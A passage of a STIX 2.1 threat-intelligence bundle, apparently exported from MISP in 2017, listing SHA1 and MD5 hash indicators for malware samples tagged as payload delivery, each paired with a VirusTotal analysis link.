"value": "https://www.virustotal.com/file/beb5a1afc328ab2f34f56a65ff4161d37be91adecfceaa83a2bc20b63fd35eed/analysis/1448496117/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8217-79a0-455e-b139-4ad502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:55.000Z",
|
|
"modified": "2017-03-29T09:44:55.000Z",
|
|
"description": "sample - Xchecked via VT: 20b1853bec49af02aff6cd22b2c25e41a48df7a2cfbff785f6a110eff8742f6b",
|
|
"pattern": "[file:hashes.SHA1 = '9368b24215794d9d9a232ceb694746ecfecf165c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:55Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8218-8cf8-47e8-a97b-443f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:56.000Z",
|
|
"modified": "2017-03-29T09:44:56.000Z",
|
|
"description": "sample - Xchecked via VT: 20b1853bec49af02aff6cd22b2c25e41a48df7a2cfbff785f6a110eff8742f6b",
|
|
"pattern": "[file:hashes.MD5 = 'e8eaae13d4fa17103d1834dac92590a2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:56Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8219-281c-4a66-82ec-46ce02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:57.000Z",
|
|
"modified": "2017-03-29T09:44:57.000Z",
|
|
"first_observed": "2017-03-29T09:44:57Z",
|
|
"last_observed": "2017-03-29T09:44:57Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8219-281c-4a66-82ec-46ce02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8219-281c-4a66-82ec-46ce02de0b81",
|
|
"value": "https://www.virustotal.com/file/20b1853bec49af02aff6cd22b2c25e41a48df7a2cfbff785f6a110eff8742f6b/analysis/1444069829/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db821a-e194-4c08-8b93-46f602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:58.000Z",
|
|
"modified": "2017-03-29T09:44:58.000Z",
|
|
"description": "sample - Xchecked via VT: 86bd7d9187a273a9b0082ca84fcfec05d7f7ad5fe03360533004eadd64a86017",
|
|
"pattern": "[file:hashes.SHA1 = '964897db0fe28c5ecadf8e1b2696838c5ac7be91']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:58Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db821b-f624-4c05-a11e-4e3002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:59.000Z",
|
|
"modified": "2017-03-29T09:44:59.000Z",
|
|
"description": "sample - Xchecked via VT: 86bd7d9187a273a9b0082ca84fcfec05d7f7ad5fe03360533004eadd64a86017",
|
|
"pattern": "[file:hashes.MD5 = '3fb59ee5222fd61bef09cab2169f8c08']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:59Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db821c-d2ac-4b70-92d0-44da02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:00.000Z",
|
|
"modified": "2017-03-29T09:45:00.000Z",
|
|
"first_observed": "2017-03-29T09:45:00Z",
|
|
"last_observed": "2017-03-29T09:45:00Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db821c-d2ac-4b70-92d0-44da02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db821c-d2ac-4b70-92d0-44da02de0b81",
|
|
"value": "https://www.virustotal.com/file/86bd7d9187a273a9b0082ca84fcfec05d7f7ad5fe03360533004eadd64a86017/analysis/1428637901/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db821d-3238-4ed9-8e5a-417102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:01.000Z",
|
|
"modified": "2017-03-29T09:45:01.000Z",
|
|
"description": "sample - Xchecked via VT: 2aefd28e364b92ea42573d5f937ec53bd864e73cd8b7d40da27cbda2c6f9592a",
|
|
"pattern": "[file:hashes.SHA1 = 'f4af0bc9a8b6e5ffc4d302647cb87d93898b11ef']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db821e-6d08-49a5-9a43-4ff702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:02.000Z",
|
|
"modified": "2017-03-29T09:45:02.000Z",
|
|
"description": "sample - Xchecked via VT: 2aefd28e364b92ea42573d5f937ec53bd864e73cd8b7d40da27cbda2c6f9592a",
|
|
"pattern": "[file:hashes.MD5 = 'a15b39d477920944b55fcafc2372aa2b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:02Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db821f-c040-4c2c-a508-4c4902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:03.000Z",
|
|
"modified": "2017-03-29T09:45:03.000Z",
|
|
"first_observed": "2017-03-29T09:45:03Z",
|
|
"last_observed": "2017-03-29T09:45:03Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db821f-c040-4c2c-a508-4c4902de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db821f-c040-4c2c-a508-4c4902de0b81",
|
|
"value": "https://www.virustotal.com/file/2aefd28e364b92ea42573d5f937ec53bd864e73cd8b7d40da27cbda2c6f9592a/analysis/1410426780/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8220-7ae8-4d93-bd61-4bd102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:04.000Z",
|
|
"modified": "2017-03-29T09:45:04.000Z",
|
|
"description": "sample - Xchecked via VT: 8e6d0b88a84ce804938ea9b5c41b0ed497ce00b070ce0b596913b4dc65501352",
|
|
"pattern": "[file:hashes.SHA1 = 'a5991632813484954b5669bacf877fb17f5c4d63']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:04Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8221-63e0-4eac-955a-496a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:05.000Z",
|
|
"modified": "2017-03-29T09:45:05.000Z",
|
|
"description": "sample - Xchecked via VT: 8e6d0b88a84ce804938ea9b5c41b0ed497ce00b070ce0b596913b4dc65501352",
|
|
"pattern": "[file:hashes.MD5 = '6e3d95c3c943aa60e56c33701fc1b804']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:05Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8222-d164-43f7-a08a-44d302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:06.000Z",
|
|
"modified": "2017-03-29T09:45:06.000Z",
|
|
"first_observed": "2017-03-29T09:45:06Z",
|
|
"last_observed": "2017-03-29T09:45:06Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8222-d164-43f7-a08a-44d302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8222-d164-43f7-a08a-44d302de0b81",
|
|
"value": "https://www.virustotal.com/file/8e6d0b88a84ce804938ea9b5c41b0ed497ce00b070ce0b596913b4dc65501352/analysis/1479736138/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8223-3fb0-4944-bcb2-47ab02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:07.000Z",
|
|
"modified": "2017-03-29T09:45:07.000Z",
|
|
"description": "sample - Xchecked via VT: a1ca4464b092f361ae6c0bf60867c93fb507ca3f9c6de045979d708997539a7f",
|
|
"pattern": "[file:hashes.SHA1 = '97a151ba419f102d57814a26712d6de21a71560a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8224-4e08-4fe5-b7c6-495802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:08.000Z",
|
|
"modified": "2017-03-29T09:45:08.000Z",
|
|
"description": "sample - Xchecked via VT: a1ca4464b092f361ae6c0bf60867c93fb507ca3f9c6de045979d708997539a7f",
|
|
"pattern": "[file:hashes.MD5 = 'c7e951e337bd6085b7a6ab14559f6514']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:08Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8224-7740-431d-82e2-4c9402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:08.000Z",
|
|
"modified": "2017-03-29T09:45:08.000Z",
|
|
"first_observed": "2017-03-29T09:45:08Z",
|
|
"last_observed": "2017-03-29T09:45:08Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8224-7740-431d-82e2-4c9402de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8224-7740-431d-82e2-4c9402de0b81",
|
|
"value": "https://www.virustotal.com/file/a1ca4464b092f361ae6c0bf60867c93fb507ca3f9c6de045979d708997539a7f/analysis/1419967013/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8225-eb2c-42e8-8a82-447702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:09.000Z",
|
|
"modified": "2017-03-29T09:45:09.000Z",
|
|
"description": "sample - Xchecked via VT: fc9b309039e083e390627f8203b6428a51ab570b3839a1e1efcc4b2855803fab",
|
|
"pattern": "[file:hashes.SHA1 = '1e519cebdc3bea32de44e674d24177ad0bb118e1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:09Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8226-95fc-4a0f-b4c1-447a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:10.000Z",
|
|
"modified": "2017-03-29T09:45:10.000Z",
|
|
"description": "sample - Xchecked via VT: fc9b309039e083e390627f8203b6428a51ab570b3839a1e1efcc4b2855803fab",
|
|
"pattern": "[file:hashes.MD5 = '2cc3e391573b9666d85eb90ecc5e8eea']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:10Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8227-3240-4b19-9c31-4da002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:11.000Z",
|
|
"modified": "2017-03-29T09:45:11.000Z",
|
|
"first_observed": "2017-03-29T09:45:11Z",
|
|
"last_observed": "2017-03-29T09:45:11Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8227-3240-4b19-9c31-4da002de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8227-3240-4b19-9c31-4da002de0b81",
|
|
"value": "https://www.virustotal.com/file/fc9b309039e083e390627f8203b6428a51ab570b3839a1e1efcc4b2855803fab/analysis/1427319640/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8228-fb04-495d-8915-41f702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:12.000Z",
|
|
"modified": "2017-03-29T09:45:12.000Z",
|
|
"description": "- Xchecked via VT: 7e275e43f70ac7962e5f4b503521af1862ac86ac8952aad52f7ff8452463b6d4",
|
|
"pattern": "[file:hashes.SHA1 = '23765dca9a08d82968d949e1b6501b9f8cb44d7e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:12Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8229-2274-4d38-89ca-4ae502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:13.000Z",
|
|
"modified": "2017-03-29T09:45:13.000Z",
|
|
"description": "- Xchecked via VT: 7e275e43f70ac7962e5f4b503521af1862ac86ac8952aad52f7ff8452463b6d4",
|
|
"pattern": "[file:hashes.MD5 = '316aa5d7bc02e6d090713de620f6f155']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:13Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db822a-a024-42fe-8393-47ce02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:14.000Z",
|
|
"modified": "2017-03-29T09:45:14.000Z",
|
|
"first_observed": "2017-03-29T09:45:14Z",
|
|
"last_observed": "2017-03-29T09:45:14Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db822a-a024-42fe-8393-47ce02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db822a-a024-42fe-8393-47ce02de0b81",
|
|
"value": "https://www.virustotal.com/file/7e275e43f70ac7962e5f4b503521af1862ac86ac8952aad52f7ff8452463b6d4/analysis/1428907876/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db822b-9e74-4a18-a510-429c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:15.000Z",
|
|
"modified": "2017-03-29T09:45:15.000Z",
|
|
"description": "- Xchecked via VT: 611f0f92151aef878550ca0cbfb98433180607f374f5b68b72393a3d43f65381",
|
|
"pattern": "[file:hashes.SHA1 = '8034a920e1acdd5fa12c55d9f9b3285a71e69d20']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:15Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db822c-1f48-4b9d-ac43-451502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:16.000Z",
|
|
"modified": "2017-03-29T09:45:16.000Z",
|
|
"description": "- Xchecked via VT: 611f0f92151aef878550ca0cbfb98433180607f374f5b68b72393a3d43f65381",
|
|
"pattern": "[file:hashes.MD5 = 'b71f9d534191b2d1a511781a9f4553c8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:16Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db822d-2c2c-4c8e-93fd-4f7302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:17.000Z",
|
|
"modified": "2017-03-29T09:45:17.000Z",
|
|
"first_observed": "2017-03-29T09:45:17Z",
|
|
"last_observed": "2017-03-29T09:45:17Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db822d-2c2c-4c8e-93fd-4f7302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db822d-2c2c-4c8e-93fd-4f7302de0b81",
|
|
"value": "https://www.virustotal.com/file/611f0f92151aef878550ca0cbfb98433180607f374f5b68b72393a3d43f65381/analysis/1445861284/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db822e-a610-4c2b-a0c2-4e7202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:18.000Z",
|
|
"modified": "2017-03-29T09:45:18.000Z",
|
|
"description": "- Xchecked via VT: 0595605bb8b6f4369e04be003c8de77d60d51c676bf463452758f0441c3dddac",
|
|
"pattern": "[file:hashes.SHA1 = 'cc4921a8102012b623413b7e75e31ae4a58a6e06']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:18Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db822f-c654-42d6-aff5-421002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:19.000Z",
|
|
"modified": "2017-03-29T09:45:19.000Z",
|
|
"description": "- Xchecked via VT: 0595605bb8b6f4369e04be003c8de77d60d51c676bf463452758f0441c3dddac",
|
|
"pattern": "[file:hashes.MD5 = 'db2a6595102bdc74d933f7a61045ec34']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:19Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8230-de8c-44cf-a841-4fed02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:20.000Z",
|
|
"modified": "2017-03-29T09:45:20.000Z",
|
|
"first_observed": "2017-03-29T09:45:20Z",
|
|
"last_observed": "2017-03-29T09:45:20Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8230-de8c-44cf-a841-4fed02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8230-de8c-44cf-a841-4fed02de0b81",
|
|
"value": "https://www.virustotal.com/file/0595605bb8b6f4369e04be003c8de77d60d51c676bf463452758f0441c3dddac/analysis/1457554261/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8231-9070-4206-95ba-434702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:21.000Z",
|
|
"modified": "2017-03-29T09:45:21.000Z",
|
|
"description": "- Xchecked via VT: 4a8336797a98e2f74062a477cf88a1c6be603102a3ead70d69823c5d3306536a",
|
|
"pattern": "[file:hashes.SHA1 = 'f6966de207489532b30d209141d6a8fbde0e0b52']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:21Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8232-6494-4d7a-8683-4c8102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:22.000Z",
|
|
"modified": "2017-03-29T09:45:22.000Z",
|
|
"description": "- Xchecked via VT: 4a8336797a98e2f74062a477cf88a1c6be603102a3ead70d69823c5d3306536a",
|
|
"pattern": "[file:hashes.MD5 = 'b9a2f379f12894dd74d8000a48c03ec7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:22Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8232-e5e8-4fd1-ba8b-47d602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:22.000Z",
|
|
"modified": "2017-03-29T09:45:22.000Z",
|
|
"first_observed": "2017-03-29T09:45:22Z",
|
|
"last_observed": "2017-03-29T09:45:22Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8232-e5e8-4fd1-ba8b-47d602de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8232-e5e8-4fd1-ba8b-47d602de0b81",
|
|
